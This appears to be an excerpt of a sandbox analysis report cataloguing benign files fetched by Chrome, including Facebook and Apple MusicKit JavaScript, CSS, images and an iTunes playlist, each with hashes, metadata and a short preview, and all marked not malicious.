                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdAppConstraintsConstants",[],(function(a,b,c,d,e,f){"use strict";a=[707152572647324..toString()];b="/apps";f.AD_APP_CONSTRAINT_VIEWER_ROLES=a;f.BASE_PATH=b}),66);.__d("AdsAPIObjectives",[],(function(a,b,c,d,e,f){e.exports={APP_INSTALLS:"APP_INSTALLS",BRAND_AWARENESS:"BRAND_AWARENESS",CANVAS_APP_ENGAGEMENT:"CANVAS_APP_ENGAGEMENT",CANVAS_APP_INSTALLS:"CANVAS_APP_INSTALLS",CONVERSIONS:"CONVERSIONS",DEPRECATED_CLICKS:"DEPRECATED_CLICKS",EVENT_RESPONSES:"EVENT_RESPONSES",EXTERNAL:"EXTERNAL",GROUP_JOINS:"GROUP_JOINS",IMPRESSIONS:"IMPRESSIONS",INCOMPATIBLE_CANVAS_APP_ENGAGEMENT:"INCOMPATIBLE_CANVAS_APP_ENGAGEMENT",INCOMPATIBLE_CANVAS_APP_INSTALLS:"INCOMPATIBLE_CANVAS_APP_INSTALLS",INCOMPATIBLE_EVENT_RESPONSES:"INCOMPATIBLE_EVENT_RESPONSES",INCOMPATIBLE_MOBILE_APP_INSTALLS:"INCOMPATIBLE_MOBILE_APP_INSTALLS",INCOMPATIBLE_OFFER_CLAIMS:"INCOMPATIBLE_OFFER_CLAIMS",INCOMPATIBLE_PAGE_ENGAGEMENT:"INCOMPATIBLE_PAGE_ENGAGEMENT",INCOMPATIBLE_PAGE_LIKES:"INCOMPATIBLE_PAGE_LIKES",
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (7012)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):356138
                                                                                                                                                                                                                                Entropy (8bit):5.45076746390211
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:XV3slatr7uVNns/RV+uojzv5C/BRtJV5nitT6GTC7ayZZA2lcdbZiiFxEytmt7my:V4iBojzYGteGnEKhU3C5rQ2kf
                                                                                                                                                                                                                                MD5:E8A499F06B95FAFA1655C0560E51BE43
                                                                                                                                                                                                                                SHA1:F2E2566A2F011BD0605A2EDE079015E3508F0DB6
                                                                                                                                                                                                                                SHA-256:6DF0CC8AC7A1DD4A7FB2466B264224D1713151E3C319D6B0D94168D6E7CECE7D
                                                                                                                                                                                                                                SHA-512:7F0D086033A5A991F52D2FFA04396121C41DE3A93F4AEAB2AFCDCC2E88353F56516F3261D5EE616DD258A7FF64A0F7469F0462979A5493802EA0D82F17F90698
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3i6ht4/yy/l/en_GB/Td5hkdtkXX5.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ActiveFocusRegionUtilsContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);c=b;g["default"]=c}),98);.__d("BaseChameleonThemeContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b={classNames:null};c=a.createContext(b);g["default"]=c}),98);.__d("BaseDOMContainer.react",["react","useMergeRefs"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||(h=d("react"));b=h;var j=b.useLayoutEffect,k=b.useRef;e=i.forwardRef(a);function a(a,b){var d=a.node,e=k(null);j(function(){var a=e.current;if(d!=null&&a!=null){a.appendChild(d);return function(){a.removeChild(d)}}},[d]);a=c("useMergeRefs")(b,e);return i.jsx("div",{ref:a})}a.displayName=a.name+" [from "+f.id+"]";d=i.memo(e);g["default"]=d}),98);.__d("BasePortalTargetContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(document.body);g["default"]=b}),98);.__d("BasePortal.react",["BaseChameleonThemeContext","B
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (333)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):877
                                                                                                                                                                                                                                Entropy (8bit):5.087140060597258
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:UXv7Fc4DpWNRKL+BK/sgl9hrIYerznR3zueIDRTLG9fkVlF38LG0DAvue1nfQOO1:u6oTTlrIYevhTuKtLG0MJQOFsCK
                                                                                                                                                                                                                                MD5:87D2E99C717F6A11EF59AB4D56189D37
                                                                                                                                                                                                                                SHA1:07395D5E315170A7ACFDD3C84D343182ABE98488
                                                                                                                                                                                                                                SHA-256:7CF7F25A6FEB976FC62596722380603118B8C7572E0867D0254D071BC2B93CD8
                                                                                                                                                                                                                                SHA-512:19233492091920B98A067943C453D1538D7844EC4DB3B489B5B72E5D41B9E9E58A1D1984679653133ED60CF7002E014530DED9B55BA62853CD8867E5936EF0AC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//p-a0c067db.js
                                                                                                                                                                                                                                Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{c as n}from"./p-2649b6ee.js";var r=n((function(n,r){Object.defineProperty(r,"__esModule",{value:!0}),r.getLanguages=void 0,r.getLanguages=function(){if("undefined"==typeof navigator)return[];if(navigator.languages)return navigator.languages;const n=navigator.language||navigator.userLanguage;return n?[n]:[]}}));export{r as n}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5027)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):5571
                                                                                                                                                                                                                                Entropy (8bit):5.228532622874084
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:upnlruLefYAl+D6Y0BVNRtxz53NcecvA61tMetkp6D8y9Ow0LqDevp:8nlaVAl+eY0BVNRtxz5WecvAeK+DOwpG
                                                                                                                                                                                                                                MD5:E3DEFF3835A17ED04C03F645B468029F
                                                                                                                                                                                                                                SHA1:307D936EE61098FA03C08A212586EEBA143DDEA4
                                                                                                                                                                                                                                SHA-256:F41E41D9DA866116299FBA3C99645C2066610E14AE3CD09BB0EFC49B601C4B85
                                                                                                                                                                                                                                SHA-512:A2802FE35074FE4235B298E2A9AF6C879065F72441635D905453EAC45949DCAB77468D2B4FA77F552B931DC350975D20BD6DC7FEEF5E0BE8C3DBF828C70DD2D9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//p-307d936e.entry.js
                                                                                                                                                                                                                                Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{r as e,e as i,h as t,H as s,c as a}from"./p-1ec6e574.js";import{H as n,g as o}from"./p-6923b857.js";import"./p-2649b6ee.js";import"./p-bb5da73d.js";import"./p-9d409825.js";import"./p-e6747c77.js";import"./p-a0c067db.js";const r={ended:"mediaEnded",error:"mediaError",pause:"mediaPause",play:"mediaPlay",playing:"mediaPlaying",volumechange:"mediaVolumeChange",fullscreenchange:"mediaFullscreenChange",webkitfullscreenchange:"mediaFullscreenChange",ms
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 206 x 58, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3841
                                                                                                                                                                                                                                Entropy (8bit):7.55092275485853
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:4G+kH1Z9kSc0gh02rcTjdVX90SqLrUGc5xelk4Go5o:L+kVTkSbzM4l1Bo5o
                                                                                                                                                                                                                                MD5:C46F54E523F2656D2F518D51623448A0
                                                                                                                                                                                                                                SHA1:D8F8311AE18FCD2B0D9BEA85EB29A20E209518F8
                                                                                                                                                                                                                                SHA-256:B9C604018A550B63D359608469904DE09B8EFC5F38395CCA106FAA49262DFDE0
                                                                                                                                                                                                                                SHA-512:9EB3830D8647D31CFBB5587C5FE0C06066E95BBEB23C3C65076EEB6448EC6D42C615FC42EBA446AF054866E15FEFC7C9D205DF4846D886B0242B76FBA7E5602A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......:............PLTE...#. #. ...# $.$#. '!!@ @# $$$$ !#. (""#. +++$$$%!!UUU# !...'!!$.!$ !%.%$. ...# ## !.### !)##@@@(""# "% %&!!$ !# #$!!)))$ # !%.!333%""$ $# !$.!$ !$ !$ &""999&&&% "#. '''&!!(((#.!$ !$$$%."# "$ $.!#### !$ $.!% $ $.!$.!$!!$.!$$$# !$. %."$ !$. '''$ !#.!,!!)""$ !# $!!$ #.#+ +$ $!!$. ######+++$. $ !$!!# !&""$ $&&&+++$.!####.!$ !333$. ( (3""---# $!!'##$.!)!!$ &""# $."$""$ "'##$ $ # !$. &&&& &$ !$ $. $ "% $ $."#.!#. $. %!!$ "# !$ &""$.!$ $ %""# $ !#.!%""$ $. $!!#.!$!!$ !$$$$$$$!!$!!'''# "% "$. #!!$ !$ $ "$ !# $.!$$$# !$."$.!%!!# # #. % $. %!!+""$ $.!% "# !# %.!$.!%!!#.!$ !% #%!!&.##!!$.!$ !$ '""#.!# !&!!#.!#!!% # !$ # # !$!!#.!& ##!!% &."$$$& $ $.!$ "$ !$.$#!!$ "#!!#.!&.#$ $ "# # $ 0 0$ !$ !#.!$!!$!!#.!$ !$ "$ $.!$!!#. R.......tRNS.....1....2..&...>...'..)..P...,.-.0=.Hk....K@...C..a.!/...*R..z$.oO..d.#..Z.....%.WN.A..\.3......58...:... ...VB..~D.j[.;...."(...in.b...Eq.G<..L..S..F.U.......h.m.?......r
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (9961)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):49381
                                                                                                                                                                                                                                Entropy (8bit):5.4893612792245285
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:JCrcX8WlQPwSgYPxSORD9S28tltgpAS3mjyV+ElS:0rcCPwSgYPxSORD9SDipAS2zEs
                                                                                                                                                                                                                                MD5:B0CE4498F3924CD09A1BB1C7BE14E311
                                                                                                                                                                                                                                SHA1:D6C702D3832D75D2FA6ED0FE02AE867A15D05134
                                                                                                                                                                                                                                SHA-256:662991BD2C2DEFEE27D0F01C27295BF675C3080E43D94AE35A5E6E50C6A48324
                                                                                                                                                                                                                                SHA-512:30DCB09798DF3EA2E4BE593C7F8DAABE614043FA8212EC0EEFF4820CD8A01F0BE6BDDE20536FBC6D6027B9EB80BA7998235D9E9D938DC8E744C7E5FE9080B26A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ArtillerySegment",["invariant","cr:9985"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"category"in a&&"description"in a||h(0,3138,JSON.stringify(a)),this.$1=!1,this.$2=babelHelpers["extends"]({},a,{id:(i++).toString(36)}),this.$3=[]}var c=a.prototype;c.getID=function(){return this.$2.id};c.begin=function(){this.$2.begin=b("cr:9985")();return this};c.end=function(){this.$2.end=b("cr:9985")();return this};c.appendChild=function(){var a=this;this.$1&&h(0,37302,this.$2.description);for(var b=arguments.length,c=new Array(b),d=0;d<b;d++)c[d]=arguments[d];c.forEach(function(b){a.$3.push(b.getID())});return this};c.setPosted=function(){this.$1=!0;return this};c.getPostData=function(){return babelHelpers["extends"]({},this.$2,{id:this.$2.id,children:this.$3.slice()})};return a}();g["default"]=a}),98);.__d("ArtillerySequence",["invariant"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"description"in a||h(0,1497,
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 48 x 36, 4-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):185
                                                                                                                                                                                                                                Entropy (8bit):5.9780303893393345
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlSYLl+1IHCRsHrXLRa+dn/23rIIGU5thNnkncm3w4qtmkW7PXl0VMa:6v/lhP0YLkyymvVGtjnUnRq0kW7N0xVp
                                                                                                                                                                                                                                MD5:07505E9DAC6DD922116F038EB58C9B88
                                                                                                                                                                                                                                SHA1:4DAB9005E4603F76A6FAD92FE78FB9C92D05B62F
                                                                                                                                                                                                                                SHA-256:C4DB75F643BB4DD47E39A9601FCC0A14621B588D5E4EBE987EE4828120BDE791
                                                                                                                                                                                                                                SHA-512:5A94B97148037E9A25AF768AF67A1AD5D4959E5D5C216DC5353FB159630302A74A990CCA20F787C024C6B7229A12920B287A88A4063514FBA534E7D1DB094C11
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://ssl.gstatic.com/store/images/regionflags/us.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR...0...$.....=k.9....PLTE"u.#t."s..OO.PP.OO.........o.......tRNSJ....J..J.j.\...DIDATx.c`T..ec$.. .].A...1..Z..!..%p.A....H...0......*.....]...Qp...al.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:M3U playlist, ASCII text
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):6090
                                                                                                                                                                                                                                Entropy (8bit):5.287646330709327
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:kfrWTuVTO9TWTsTFTbTuTvTJTF5TuTiTTbTMTaTETSTDTuTHTcTBTcTB+ThPTvTt:WyT6TO9TWTsTFTbTuTvTJTF5TuTATbTr
                                                                                                                                                                                                                                MD5:03A005894A934EC37110D79A2E93D21B
                                                                                                                                                                                                                                SHA1:315AC4C36EC9AC2BDA26CB86D163125D5F8B6CFA
                                                                                                                                                                                                                                SHA-256:3CECFCD00F302182EB21CFBFD1FF878C74A45E44AA003873FE67EDFBD3215AB8
                                                                                                                                                                                                                                SHA-512:ADB0BB7595B98ED5DAD16EBB7A2275D258B6CABAED4A954DC50501E43226D9BC822AF23E665B419F8744FC6B91295B4AE50841F1C56CF47113743184B3B42104
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/a0/6f/ba/a06fba65-f57a-cf31-312d-b06e3b087612/P875466468_Anull_trickPlay_gr210_sdr_342x740_iframes.m3u8
                                                                                                                                                                                                                                Preview:#EXTM3U.#EXT-X-TARGETDURATION:10.#EXT-X-VERSION:7.#EXT-X-MEDIA-SEQUENCE:0.#EXT-X-PLAYLIST-TYPE:VOD.#EXT-X-I-FRAMES-ONLY.#EXT-X-MAP:URI="P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4",BYTERANGE="897@0".#EXTINF:0.50000,..#EXT-X-BYTERANGE:12490@897.P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:12779@13387.P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:11674@26166.P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:12472@37840.P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:12632@50312.P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:12607@62944.P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:12862@75551.P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:12277@88413.P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4.#EXTINF:0.50000,..#EX
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:C source, ASCII text, with very long lines (438)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2078
                                                                                                                                                                                                                                Entropy (8bit):5.387806824958302
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:YHTs34IWJ6O346+3+96s3zf3Ek+n8No4YGbIh4:6fIWJj3453wx3D3Ex8NMq
                                                                                                                                                                                                                                MD5:C85FC19BDEF9BB7DC0AD69D0BCEF07D8
                                                                                                                                                                                                                                SHA1:BDC00700BE6D5B5FBA7F565C6FB2FD1AD39D06A4
                                                                                                                                                                                                                                SHA-256:6A694C1ECFF2EE11F8075A915B3C3FEEAF2EB33DC04CD8144CDD762E71260051
                                                                                                                                                                                                                                SHA-512:DDF8AE079503BCE91ACC37A3A7552B52ED0DE2D9AF79076A1C04F7991D3775C7A829298D5A3A9962040A5C2FB6A0699D6584510704004ECBCB6471D33BE38C5F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("Deferred",["Promise"],(function(a,b,c,d,e,f){"use strict";var g;(g||(g=b("Promise"))).resolve();a=function(){function a(a){var c=this;a=a||g||(g=b("Promise"));this.$1=!1;this.$2=new a(function(a,b){c.$3=a,c.$4=b})}var c=a.prototype;c.getPromise=function(){return this.$2};c.resolve=function(a){this.$1=!0,this.$3(a)};c.reject=function(a){this.$1=!0,this.$4(a)};c.isSettled=function(){return this.$1};return a}();f["default"]=a}),66);.__d("isArDotMetaDotComURI",[],(function(a,b,c,d,e,f){var g=new RegExp("(^|\\.)ar\\.meta\\.com$","i"),h=["https"];function a(a){if(a.isEmpty()&&a.toString()!=="#")return!1;return!a.getDomain()&&!a.getProtocol()?!1:h.indexOf(a.getProtocol())!==-1&&g.test(a.getDomain())}f["default"]=a}),66);.__d("isHorizonDotMetaDotComURI",[],(function(a,b,c,d,e,f){var g=new RegExp("(^|\\.)horizon\\.meta\\.com$","i"),h=["https"];function a(a){if(a.isEmpty()&&a.toString()!=="#")return!1;return!a.getDomain()&&!a.getProtocol()?!1:h.indexOf(a.getProtocol())!==
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):39178
                                                                                                                                                                                                                                Entropy (8bit):7.986263648230382
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:pkXIlvy3Jmdf7NDnfY4zGDgyOk1Qfdo/5IMVr2deM16QXEoX+ncl/qtEXEWL:pIECy7dfY4zGMyObfdo/5jmLXEm+nK/1
                                                                                                                                                                                                                                MD5:CD2CF2DBFA12E22A6C553016D2913637
                                                                                                                                                                                                                                SHA1:A94119AAA47E7A27CA8D104E15AABD04B33354B6
                                                                                                                                                                                                                                SHA-256:2D4A8FCE6CF39A05B6EC8EC5054E1BD7A236B4767763D0E81333EE768F8D4E4F
                                                                                                                                                                                                                                SHA-512:30012A778ECF9F3D349A0B42D0D7F67A22992DAD7BCAD5B81D9B04F6FBD7B7A82BCA15511A0430D115AB236F6190A78019F4C172CF18855670FAC0AED8E88304
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://play-lh.googleusercontent.com/rbz2GOYtKwW-yK99VC_CBSUL_k2PWkkL4NfYubMEmKBCPbGuNxZb_pP7N2WAKZsQUw=w416-h235-rw
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8L..../..2.M@r.H.$.1kD.....Y......?.../.E.>|.kTuH.v.m.[.#...:..vw.tkn..d..s.Pw..#I....n.,...1E.C....9"..'.#mo.....v.cYy.v.]y{...0.Hy..*....fM..._.k..@..X-..k8.........0S..@R+P...HR.6...|E.....b./0p.........I......0..;"...J..o...DIU.Z....$..J.\.%...o9U..!...%..Dkd}QD9..z@..W.#.s].".4...m.n.d.<.A.W..."3......3.#.v.....6~..x...oBx..T.$IRU%.....E.......K.X.?....R.((.........!. ....Q...............=.....`X..=J..LXJ.@A.e.oi"..E.2... .![..&....V)......"C8.*.....cD...|K$...X.(.......b..D"..JN..(.c...u...(.B..aTX..1...0....0.(..bx5.=..!..B[..e.z./.uz...Z.............f..f..@((.*...@..p......M....J.....|.......o..ed......2.....Kk.v./.S..+4oo.#J.Bs.b..k....u....!....%,1x..X..>...j;.......@.J.`..8.?.z?...cD>B...Fn.F....z..t.sDL...:....{.~......fL..$.....e:........hL ....t.x.Cm...J..PYIu..$#.B.....`.d$..4.T..-@.g......H..Y.6..Y......c.u...o.............efff..3/..x.s.{.{^W.'.:..u.....]....<Ex...4Z.Z.d..[X...U..W!...2..\..-.%WKV...*d-V.W.Z.Y.9.-V.+Y[.FaZrR-..S
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6906)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):44745
                                                                                                                                                                                                                                Entropy (8bit):5.439897654346927
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:h1dccM2SFV4I6JbrvragzviWkUl/x5QnB2fBe5ZTcRpNZHC95bPFPGj50o8hGnlS:HdcxV4FPWgfVl/x6B5iaIlUIHwr
                                                                                                                                                                                                                                MD5:AB0BDE385D5EC9B7748814C2C3F9F410
                                                                                                                                                                                                                                SHA1:AA909CED086990905CA1E37FC0474CB2AEDB3C3B
                                                                                                                                                                                                                                SHA-256:567D55847C489926692207B35080D83B89F26C67632C55B84D643F29951A5C79
                                                                                                                                                                                                                                SHA-512:0C4C479A195AE8B0FE9A4F5A36E5DA5E67F24953091FE49CF759683D6CCFA6556ACACDE2E15A340C94D561A43F07B3695D0B3AEDFCF7A59AEFD4DC8103AC15C4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yI/l/0,cross/X9tSrDjPzyV.css"
                                                                                                                                                                                                                                Preview:._58-0{float:left;max-width:100%}._58-0 input._58al{border-left:.1px solid transparent}._58-2 ._58ak{border:none;cursor:text;margin:0 2px 2px 0;max-width:100%;overflow:hidden}._58-2 ._58al{border:none;display:inline-block;margin:0;vertical-align:middle}._58-3,._58-2 ._58al{font-size:100%}._58-3{left:0;min-width:3em;padding-right:2em;position:absolute;top:0;visibility:hidden;white-space:nowrap}._4tb6{cursor:text;float:left;vertical-align:middle;width:4px}.._9vry ._3ixn{position:absolute}.._z8p{position:relative}._z8p:before{border:2px solid #2887e6;border-radius:3px;bottom:-4px;content:'';left:-4px;pointer-events:none;position:absolute;right:-4px;top:-4px;z-index:2}.._2tt5{border-bottom:1px solid #ebedf0;padding-bottom:12px}._2tt6{padding:12px 0 8px 0}.._7mfb{margin:1px}._7mfb *{vertical-align:baseline}.._342h{color:#4b4f56;margin-bottom:0;margin-top:8px}._342i{border-bottom:solid 1px #e9eaeb}._2bh_{border-top:1px solid #e9eaeb;margin-top:8px}._966t{border-top:2px solid #dadde1;padding-
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 56 x 56, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                Entropy (8bit):7.210997704214975
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:6v/7gp3MDBLr/PNr7ol0vTo/vTKxHC+l8yeah7mqnvfSqZ1:xp3WNr9PzveGxHCR4hvaqZ1
                                                                                                                                                                                                                                MD5:7659F09C75B5BC572384B6DB3154F5C3
                                                                                                                                                                                                                                SHA1:F493682903E175C5F1A08D14CF8846B8C6EC18B7
                                                                                                                                                                                                                                SHA-256:5933627C22BDBB77791361631AB1ADA2C9437314233C714AFA455D38556980F8
                                                                                                                                                                                                                                SHA-512:092491AFB0B6DF252DFBA5F29BA9F3AA5A9D918FDCF2CA514A51F54E6A454382B780B7C8B6DA9C20DC44377A075F43F40032135F4D4D582E66A661C0A4793DE0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...8...8............sRGB........\IDATX...=/.A....$..-.q.j.j_@8..O ..K......J).$..Ph..I.r.u.+n...7...lc..N.M..q.\....Q`...a.h....x.T..c....5...F2..a_:.z.;...D.X$..d:..d.....p..9.2...U.MV..D.*.....=I5..G<.."."...w...-K..*....R.....9.#..$.O.......F^.9|...,..%0$w#.,.M.D......"w.....5N..R.......QM2.2..U.n .d...wi.....-...|.M.b...4....&.\.....[dAlF_...\KzQ..L.Aq.\....@&..J.nF....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2701)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):3245
                                                                                                                                                                                                                                Entropy (8bit):5.348177629215205
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:upnlrpevhTuAG9T+ojsBSBY7p0aCW1//H/71LJBMLEvgj+CCMSmvygNscKApaWv+:upnlruLeTdjBBYtPdfrpijC8vyepaTd
                                                                                                                                                                                                                                MD5:706B93A70D825C3906B9080E0C5924E8
                                                                                                                                                                                                                                SHA1:BA10D0661DF8C6762D99871F7168C2C729841592
                                                                                                                                                                                                                                SHA-256:7C784877F18CDFF0C5F948BF11E89475E272EDB8A9130C5518B3EB71DDC74781
                                                                                                                                                                                                                                SHA-512:9AD813150AD90DA8CBAB1A70C56F35130BD3F49F5A3A3372BF7B37ECD9444EA367FA7EBC4E70030843D913CD74665B6DB4F33FA1A2288222344FD9230B684007
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//p-9d409825.js
                                                                                                                                                                                                                                Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{c as n,a as t}from"./p-2649b6ee.js";var o=n((function(n,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default="undefined"!=typeof FastBoot?FastBoot.require("buffer").Buffer:"undefined"!=typeof process&&null!==process.versions&&null!==process.versions.node?Buffer:window.Buffer})),e=n((function(n,t){Object.defineProperty(t,"__esModule",{value:!0}),t.memoize=void 0,t.memoize=function(n){return function(...t){let o="",e=t.length;for(n._memoi
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 564 x 168, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):10071
                                                                                                                                                                                                                                Entropy (8bit):7.891099481159603
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:qg2y7LIhCKi1ihWVEYumqlG+fhNmCdLhpUP4FKxozeMTGiI2TUiut8:qfy4hl67VXqg+fh39WxyeMzTU8
                                                                                                                                                                                                                                MD5:F06B908907D5D4F2AAF733E2BEE7EA8E
                                                                                                                                                                                                                                SHA1:073DCF14C7C312BE5DAEB4FA2113429E019FDBC7
                                                                                                                                                                                                                                SHA-256:583714033CAB0D76045A8D4BBFB2326983F40D5C2CFA239E9527DA9617686E6B
                                                                                                                                                                                                                                SHA-512:32CABBC903EC76538C30B4734924267BD1364236629ABFB36919CFE4BE498360A6C0D3142BBC8593B8418B807336912E612E56E358993CA80E6F93947E9434D3
                                                                                                                                                                                                                                Malicious:false
